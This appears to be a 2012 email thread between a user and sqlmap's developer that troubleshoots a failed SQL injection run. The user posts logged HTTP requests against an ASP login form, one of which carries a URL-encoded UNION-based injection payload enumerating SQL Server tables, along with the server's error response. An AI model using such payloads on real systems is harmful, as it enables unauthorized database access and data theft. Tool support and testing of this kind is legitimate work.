P.s. http://support.microsoft.com/kb/240872

This is a classic permission error. I am more than keen to see how Havij does this. Waiting for your reply

Kind regards,
Miroslav Stampar

On Feb 22, 2012 7:38 AM, "Miroslav Stampar" <miroslav.stampar@gmail.com> wrote:

Hi.

As there is no DBUSERNAME in the request I would say that the request is not the problem here. Now, I am interested how Havij manages it though.

Is there a way for you to provide me privately with either: target url or untouched traffic file together with Burp log for Havij run against that target?

Without more info I won't be able to help you more

Kind regards,
Miroslav Stampar

On Feb 21, 2012 10:25 PM, "John Booth" <sqlmapissues@hotmail.com> wrote:
DBUSERNAME = database user name
DATABASENAME = name of the current database

let me know if this is not helpful or if you need the snippet of html (which is just the hopepage)

HTTP request [#1]:
POST /index.asp?action=auth HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: site.com
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
Connection: close

UN=admin&PW=admin&x=0&y=0

HTTP response [#1] (200 OK):
Content-length: 7091
X-powered-by: ASP.NET
Set-cookie: sitecom=0; path=/, ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
Age: 6
Uri: http://site.com:80/index.asp?action=auth
Server: Microsoft-IIS/6.0
Connection: close
Cache-control: private
Date: Tue, 21 Feb 2012 21:15:23 GMT
Content-type: text/html


**

HTML OF HOMEPAGE - if relevant will add

**

############################################################################

HTTP request [#2]:
POST /index.asp?action=auth HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: site.com
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
Connection: close

UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0

HTTP response [#2] (500 Internal Server Error):
Content-length: 480
X-powered-by: ASP.NET
Set-cookie: sitecom=0; path=/
Age: 2
Uri: http://www.site.com:80/index.asp?action=auth
Server: Microsoft-IIS/6.0
Connection: close
Cache-control: private, no-store
Date: Tue, 21 Feb 2012 21:15:28 GMT
Content-type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

 <font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in database 'DATABASENAME'.</font>
<p>
<font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>, line 16</font>

############################################################################